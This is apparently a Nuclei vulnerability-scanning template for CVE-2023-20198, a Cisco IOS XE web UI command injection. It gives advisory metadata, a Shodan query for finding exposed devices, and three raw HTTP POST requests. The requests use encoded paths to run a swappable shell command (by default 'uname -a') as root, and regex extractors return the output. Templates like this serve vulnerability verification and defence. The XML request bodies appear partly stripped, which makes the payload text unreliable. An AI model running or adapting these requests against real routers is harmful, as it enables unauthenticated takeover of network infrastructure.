id: CVE-2023-20198 info: name: Cisco IOS XE Web UI - Command Injection author: iamnoooob,rootxharsh,pdresearch,nullenc0de severity: critical description: | A vulnerability in the web UI component of Cisco IOS XE Software could allow an unauthenticated, remote attacker to execute arbitrary commands with root privileges on the underlying operating system. This vulnerability is due to improper input validation in the web UI. An attacker could exploit this vulnerability by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary commands with root privileges on the underlying operating system. impact: | Unauthenticated attackers can execute arbitrary commands with root privileges through crafted HTTP requests to the web UI component, potentially compromising the entire Cisco IOS XE router and all managed network traffic. remediation: | Apply Cisco security patches from advisory cisco-sa-iosxe-webui-privesc-j22SaA4z that validate input in the web UI and prevent command injection in the SOAP API. reference: - https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z - https://www.rapid7.com/blog/post/2023/10/16/etr-cisco-ios-xe-web-ui-cve-2023-20198-active-exploitation/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-20198 epss-score: 0.99571 epss-percentile: 0.99943 metadata: max-request: 1 verified: true vendor: cisco product: ios_xe shodan-query: http.html_hash:1076109428 tags: cve,cve2023,cisco,rce,router,iot,network,kev,vkev,vuln variables: cmd: 'uname -a' http: - raw: - | POST /%77eb%75i_%77sma_Http HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0) Content-Type: text/xml; charset=UTF-8 Connection: close admin***** {{cmd}} - | POST /%2577eb%2575i_%2577sma_Http HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0) Content-Type: text/xml; charset=UTF-8 Connection: close admin***** {{cmd}} - | POST /%2577ebui_wsma_https HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0) Content-Type: text/xml; charset=UTF-8 Connection: close admin***** {{cmd}} stop-at-first-match: true matchers: - type: word part: body words: - XMLSchema - execLog - Cisco Systems - - condition: and extractors: - type: regex part: body group: 1 regex: - "([\\s\\S]*?)" # digest: 4a0a00473045022100c371913feda10991b769bc3b680d1077b71340e8ab6a1cb852d237694d8937ec02207235c3e226070c148c891ba28ca9375c3eaec563fe2ba5b5683ec4c3527241c7:922c64590222798bb761d5b6d8e72950